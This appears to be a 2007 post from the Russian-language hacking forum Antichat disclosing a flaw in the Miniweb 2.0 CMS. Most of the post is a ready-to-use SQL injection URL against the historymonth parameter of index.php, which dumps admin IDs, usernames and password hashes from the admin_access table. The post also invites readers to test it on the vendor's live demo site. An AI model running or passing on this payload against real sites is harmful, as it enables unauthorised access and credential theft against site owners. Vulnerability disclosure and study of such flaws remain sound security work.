ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
Перезагрузить страницу Miniweb 2.0
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Miniweb 2.0
  #1  
Старый 08.12.2007, 03:59
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869

Репутация: 3033


По умолчанию Miniweb 2.0
Сайт производителя : http://www.miniweb2.com/15modules/blog-writer.htm

Уязвимость: не фильтруется переменная в параметре historymonth, скрипта index.php

Сплойт:
PHP код:
http://localhost/index.php?historyyear=2007&historymonth=-12+union+select+1,2,concat(user_id,0x3a,username,0x3a,password),0,5,6,7,8,9,0+from+admin_access/* 
Потестить можно на демоверсии на сайте производителя.
з\ы алгоритм шифрования пароля для меня остался загадкой
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
Последний раз редактировалось Constantine; 08.12.2007 в 05:15..
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Сетевой чат Vypress Chat 2.0 •••™NO FEAR™••• Чаты 33 26.06.2008 12:02
Фильм - Сеть 2.0 /Net 2.0, The/ (2006) PEPSICOLA Болталка 7 07.02.2006 22:10
Проложение витых пар в городских домах Рогатый Трупоед Аппаратное обеспечение 11 20.09.2004 09:08



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ